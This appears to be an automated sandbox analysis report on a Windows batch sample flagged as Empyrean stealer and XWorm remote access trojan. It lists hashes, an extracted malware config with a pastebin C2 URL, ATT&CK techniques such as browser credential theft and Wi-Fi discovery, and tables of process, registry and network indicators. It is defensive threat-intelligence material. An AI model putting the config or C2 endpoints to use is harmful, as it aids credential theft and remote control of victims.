empyrean | 09074b2fe4ff12e79e75f850359a3ee191027ebf39e4a6c0ea7e70dcadc0c2d1

Resubmissions

25-08-2024 04:35

240825-e763qsvdnh 1

25-08-2024 04:35

17-08-2024 23:21

17-08-2024 23:03

17-08-2024 06:42

17-08-2024 06:24

17-08-2024 05:49

17-08-2024 03:15

Analysis

max time kernel
915s
max time network
912s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-08-2024 06:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

systemruntimes.bat
Size

3.0MB
MD5

6c546242564cda9fc4fee896e366cacd
SHA1

3a753043686d6da8cb7fbd193fe2179ce4727b03
SHA256

09074b2fe4ff12e79e75f850359a3ee191027ebf39e4a6c0ea7e70dcadc0c2d1
SHA512

2d932be458f773054bb175d531a20b1b0aebc10f2ecac0d2f2de364f9c6be9661e49fb29f6159092e46d7340fc361560eb121405625ae8a4c46594f9acf92222
SSDEEP

12288:Iqly9ZqhqhqhqhqhqhqClypypypypy/lBu0jAJgtfEoMCxqC6EyAnMFU/pv:IIyZ888888BOOOOq/u1gQwqbAM4v

Score

10^/10

empyrean xworm credential_access defense_evasion discovery execution persistence privilege_escalation pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

a9DusJ8RwQTWHwj3

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/jkmUR9iK

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5748-341-0x000001B9BD7F0000-0x000001B9BD800000-memory.dmp	family_xworm

Detects Empyrean stealer 1 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023637-1831.dat	family_empyrean

Empyrean Stealer
An Open-source information stealer.
stealer empyrean
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
68	5748	powershell.exe
84	5748	powershell.exe
117	5748	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4832	powershell.exe
844	powershell.exe
5748	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	jxeuas.exe

Executes dropped EXE 10 IoCs

pid	Process
5264	jxeuas.exe
524	ilrwly.exe
4936	main.exe
5116	main.exe
7372	pycdc.exe
7820	pycdas.exe
5080	de4py_x64_py3.11.exe
4556	de4py_x64_py3.11.tmp
2552	de4py.exe
7820	de4py.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 4 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx	svchost.exe

Loads dropped DLL 64 IoCs

pid	Process
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
5116	main.exe
7372	pycdc.exe
7820	pycdas.exe
7820	de4py.exe
7820	de4py.exe
7820	de4py.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023562-782.dat	upx
behavioral1/memory/5116-786-0x00007FF9E76B0000-0x00007FF9E7B1E000-memory.dmp	upx
behavioral1/files/0x000700000002351b-792.dat	upx
behavioral1/files/0x0007000000023559-795.dat	upx
behavioral1/memory/5116-802-0x00007FF9FF020000-0x00007FF9FF04D000-memory.dmp	upx
behavioral1/files/0x0007000000023522-806.dat	upx
behavioral1/memory/5116-811-0x00007FFA02CC0000-0x00007FFA02CCD000-memory.dmp	upx
behavioral1/files/0x0007000000023563-821.dat	upx
behavioral1/memory/5116-827-0x00007FF9E9060000-0x00007FF9E908B000-memory.dmp	upx
behavioral1/memory/5116-826-0x00007FFA02CF0000-0x00007FFA02D14000-memory.dmp	upx
behavioral1/memory/5116-825-0x00007FF9E9090000-0x00007FF9E914C000-memory.dmp	upx
behavioral1/files/0x0007000000023569-824.dat	upx
behavioral1/memory/5116-823-0x00007FF9E76B0000-0x00007FF9E7B1E000-memory.dmp	upx
behavioral1/memory/5116-818-0x00007FF9E9150000-0x00007FF9E917E000-memory.dmp	upx
behavioral1/files/0x0007000000023564-816.dat	upx
behavioral1/memory/5116-815-0x00007FF9FFAF0000-0x00007FF9FFAFD000-memory.dmp	upx
behavioral1/files/0x0007000000023521-813.dat	upx
behavioral1/memory/5116-810-0x00007FF9FE710000-0x00007FF9FE729000-memory.dmp	upx
behavioral1/files/0x0007000000023565-809.dat	upx
behavioral1/memory/5116-805-0x00007FF9F0380000-0x00007FF9F03B4000-memory.dmp	upx
behavioral1/files/0x0007000000023560-804.dat	upx
behavioral1/files/0x000700000002351e-801.dat	upx
behavioral1/memory/5116-800-0x00007FFA02CD0000-0x00007FFA02CE9000-memory.dmp	upx
behavioral1/files/0x000700000002351a-798.dat	upx
behavioral1/files/0x000700000002351c-831.dat	upx
behavioral1/memory/5116-832-0x00007FF9E8A80000-0x00007FF9E8AC2000-memory.dmp	upx
behavioral1/memory/5116-839-0x00007FF9FE5D0000-0x00007FF9FE5EC000-memory.dmp	upx
behavioral1/files/0x0007000000023558-850.dat	upx
behavioral1/memory/5116-849-0x00007FF9DE870000-0x00007FF9DEBE5000-memory.dmp	upx
behavioral1/files/0x000700000002351d-853.dat	upx
behavioral1/memory/5116-862-0x00007FF9E8990000-0x00007FF9E89B6000-memory.dmp	upx
behavioral1/memory/5116-863-0x00007FF9E8870000-0x00007FF9E8988000-memory.dmp	upx
behavioral1/memory/5116-861-0x00007FF9E9060000-0x00007FF9E908B000-memory.dmp	upx
behavioral1/memory/5116-867-0x00007FF9E8F50000-0x00007FF9E8F7E000-memory.dmp	upx
behavioral1/memory/5116-882-0x00007FF9E7660000-0x00007FF9E766D000-memory.dmp	upx
behavioral1/memory/5116-886-0x00007FF9E7630000-0x00007FF9E763C000-memory.dmp	upx
behavioral1/memory/5116-896-0x00007FF9E3DE0000-0x00007FF9E3E2C000-memory.dmp	upx
behavioral1/memory/5116-900-0x00007FF9E8850000-0x00007FF9E886F000-memory.dmp	upx
behavioral1/memory/5116-899-0x00007FF9E2C10000-0x00007FF9E2C2E000-memory.dmp	upx
behavioral1/memory/5116-901-0x00007FF9E2BE0000-0x00007FF9E2C09000-memory.dmp	upx
behavioral1/memory/5116-898-0x00007FF9E4070000-0x00007FF9E4081000-memory.dmp	upx
behavioral1/memory/5116-904-0x00007FF9DE490000-0x00007FF9DE6E2000-memory.dmp	upx
behavioral1/memory/5116-897-0x00007FF9DE6F0000-0x00007FF9DE861000-memory.dmp	upx
behavioral1/memory/5116-895-0x00007FF9E4D80000-0x00007FF9E4D99000-memory.dmp	upx
behavioral1/memory/5116-894-0x00007FF9E8990000-0x00007FF9E89B6000-memory.dmp	upx
behavioral1/memory/5116-893-0x00007FF9E6D80000-0x00007FF9E6D97000-memory.dmp	upx
behavioral1/memory/5116-892-0x00007FF9E4DA0000-0x00007FF9E4DC2000-memory.dmp	upx
behavioral1/memory/5116-891-0x00007FF9E70A0000-0x00007FF9E70B0000-memory.dmp	upx
behavioral1/memory/5116-890-0x00007FF9DE870000-0x00007FF9DEBE5000-memory.dmp	upx
behavioral1/memory/5116-889-0x00007FF9E6DA0000-0x00007FF9E6DB4000-memory.dmp	upx
behavioral1/memory/5116-887-0x00007FF9E6DC0000-0x00007FF9E6DD5000-memory.dmp	upx
behavioral1/memory/5116-885-0x00007FF9E8840000-0x00007FF9E884B000-memory.dmp	upx
behavioral1/memory/5116-884-0x00007FF9E89C0000-0x00007FF9E8A78000-memory.dmp	upx
behavioral1/memory/5116-883-0x00007FF9E7640000-0x00007FF9E7652000-memory.dmp	upx
behavioral1/memory/5116-881-0x00007FF9E7670000-0x00007FF9E767C000-memory.dmp	upx
behavioral1/memory/5116-880-0x00007FF9E7680000-0x00007FF9E768C000-memory.dmp	upx
behavioral1/memory/5116-879-0x00007FF9E7690000-0x00007FF9E769B000-memory.dmp	upx
behavioral1/memory/5116-878-0x00007FF9E76A0000-0x00007FF9E76AB000-memory.dmp	upx
behavioral1/memory/5116-877-0x00007FF9E7BA0000-0x00007FF9E7BAC000-memory.dmp	upx
behavioral1/memory/5116-876-0x00007FF9E8800000-0x00007FF9E880C000-memory.dmp	upx
behavioral1/memory/5116-875-0x00007FF9E8810000-0x00007FF9E881E000-memory.dmp	upx
behavioral1/memory/5116-874-0x00007FF9E8820000-0x00007FF9E882D000-memory.dmp	upx
behavioral1/memory/5116-873-0x00007FF9E8830000-0x00007FF9E883C000-memory.dmp	upx
behavioral1/memory/5116-872-0x00007FF9FAD60000-0x00007FF9FAD6C000-memory.dmp	upx

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\KasperskyLab	ilrwly.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
67	pastebin.com
496	raw.githubusercontent.com
584	pastebin.com
587	pastebin.com
126	raw.githubusercontent.com
129	discord.com
494	raw.githubusercontent.com
581	pastebin.com
585	pastebin.com
68	pastebin.com
125	raw.githubusercontent.com
130	discord.com
142	discord.com
495	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
140	ipapi.co
134	ipapi.co
135	ipapi.co
138	ipapi.co

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start	svchost.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Europe\is-INNBF.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Pacific\is-IQC7V.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-82G57.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-3ODMC.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-226BH.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\Argentina\is-746RC.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Africa\is-RP3PR.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-BA5KT.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-54O5C.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\images\is-5LHQK.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-EV8NO.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-J98T4.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-CN8N5.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\is-2OJUU.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-9SO9F.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-6KSAI.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-KNK81.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\North_Dakota\is-JN217.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-1H14C.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-FV50I.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\is-QP9VO.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-37DN5.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\is-P3G3C.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Europe\is-31I4F.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Pacific\is-R7GTF.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\images\is-IUA6H.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-L3FNE.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Asia\is-QS7V0.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Asia\is-1003T.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-2D9MA.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\is-S6QLN.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Asia\is-PJMF2.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-AE8OA.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Europe\is-TML8B.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Europe\is-57J6L.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-UTTVL.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-043L5.tmp	de4py_x64_py3.11.tmp
File opened for modification	C:\Program Files (x86)\de4py\samples\py2exe\main.exe	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-S8R77.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-QEDFN.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-GV8QQ.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Antarctica\is-RU6A8.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Europe\is-7P57L.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Europe\is-083NL.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-D2S80.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-9V2OO.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-44ASH.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-KONAT.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-TG5KE.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Pacific\is-OK7F3.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\is-0N859.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\Argentina\is-T3D7S.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\is-IKB0J.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\is-M7G07.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\is-164V2.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\America\is-M8265.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\encoding\is-RTBUE.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-6KILI.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Indian\is-IQHLR.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\is-EL8CC.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-4J27N.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\msgs\is-4O3BB.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tcl\tzdata\Etc\is-LVT8H.tmp	de4py_x64_py3.11.tmp
File created	C:\Program Files (x86)\de4py\samples\py2exe\lib\tk\demos\images\is-DCTBP.tmp	de4py_x64_py3.11.tmp

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\de4py_x64_py3.11.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0003000000022f01-625.dat	pyinstaller
behavioral1/files/0x0007000000023d43-7967.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	de4py_x64_py3.11.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jxeuas.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ilrwly.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pycdc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pycdas.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	de4py_x64_py3.11.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
644	netsh.exe
4496	cmd.exe
3564	netsh.exe
4204	cmd.exe
4440	netsh.exe
4956	cmd.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f	svchost.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
